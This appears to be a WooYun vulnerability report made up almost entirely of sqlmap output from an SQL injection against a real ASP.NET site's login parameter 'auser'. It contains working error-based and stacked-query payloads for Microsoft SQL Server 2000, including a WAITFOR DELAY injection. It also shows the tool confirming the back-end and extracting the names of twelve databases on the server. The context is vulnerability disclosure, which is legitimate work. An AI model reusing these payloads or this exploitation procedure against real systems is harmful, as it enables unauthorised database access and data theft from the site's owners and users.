WooYun.org

还没跑完 先提交吧
Place: GET
Parameter: auser
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: auser=mmjF' AND 1305=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(102)+CHAR
(113)+CHAR(58)+(SELECT (CASE WHEN (1305=1305) THEN CHAR(49) ELSE CHAR(48) END))+
CHAR(58)+CHAR(99)+CHAR(97)+CHAR(110)+CHAR(58))) AND 'pBql'='pBql&apass=pmgA&butt
on=????
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: auser=mmjF'; WAITFOR DELAY '0:0:5';--&apass=pmgA&button=????
---
do you want to exploit this SQL injection? [Y/n] y
[20:57:52] [INFO] testing Microsoft SQL Server
[20:57:52] [INFO] confirming Microsoft SQL Server
[20:57:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:57:52] [INFO] fetching database names
[20:57:52] [INFO] the SQL query used returns 12 entries
[20:57:54] [INFO] fetching number of databases
[20:57:54] [INFO] retrieved:
[20:57:54] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
12
[20:58:56] [INFO] retrieved: ccoa
[21:03:24] [INFO] retrieved: dgnzw
[21:11:13] [INFO] retrieved: emily-kg-new
[21:26:46] [INFO] retrieved: master
[21:34:15] [INFO] retrieved: model
[21:41:21] [INFO] retrieved: msdb
[21:46:25] [INFO] retrieved: Northwind
[21:59:54] [INFO] retrieved: nzwQY2
[22:07:42] [INFO] retrieved: pubs
[22:13:26] [INFO] retrieved: sme0769
[22:22:34] [INFO] retrieved: sun-info
[22:33:41] [INFO] retrieved: tem